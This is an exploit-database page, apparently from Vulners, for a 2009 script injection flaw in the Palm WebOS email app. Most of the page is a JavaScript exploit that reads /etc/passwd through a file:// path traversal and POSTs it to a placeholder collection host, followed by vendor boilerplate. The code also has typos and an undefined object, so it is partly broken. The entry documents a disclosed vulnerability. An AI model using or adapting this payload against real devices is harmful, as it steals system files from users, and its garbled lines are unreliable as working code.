Lucene search
K

Palm WebOS 1.01.1 - Email Arbitrary Script Injection

🗓️ 05 Oct 2009 00:00:00Reported by Townsend Ladd HarrisType 
exploitpack
 exploitpack
👁 10 Views

Palm WebOS 1.01.1 Email Script Injection Vulnerabilit

Code
source: https://www.securityfocus.com/bid/36592/info

Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary script code. Successful exploits can compromise the application.

Versions prior to WebOS 1.2 are vulnerable.

<script>
var getdata = null;
get = new XMLHttpRequest();

get.open(&#039;GET&#039;, "file://../../../../../../../../../etc/passwd");
get.send("");
get.onreadystatechange = function() {
    if (get.readyState == 4) {
	getdata = get.responseText;
	POST(getdata);
    }
}

function POST (egg) {
    post = new XMLHttpRequest();
    var strResult;
    //Edit WEBSITE_OF_CHOICE for Grabber
    post.open(&#039;POST&#039;, "WEBSITE_OF_CHOICE",false);
    post.setRequestHeader(&#039;Conetnt-Type&#039;,&#039;application/x-www-form-urlencoded&#039;);
    post.send(egg);
    get.send("");
    post = null;
    strResult = objHTTP.tesponseTetxt;
}
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Oct 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
10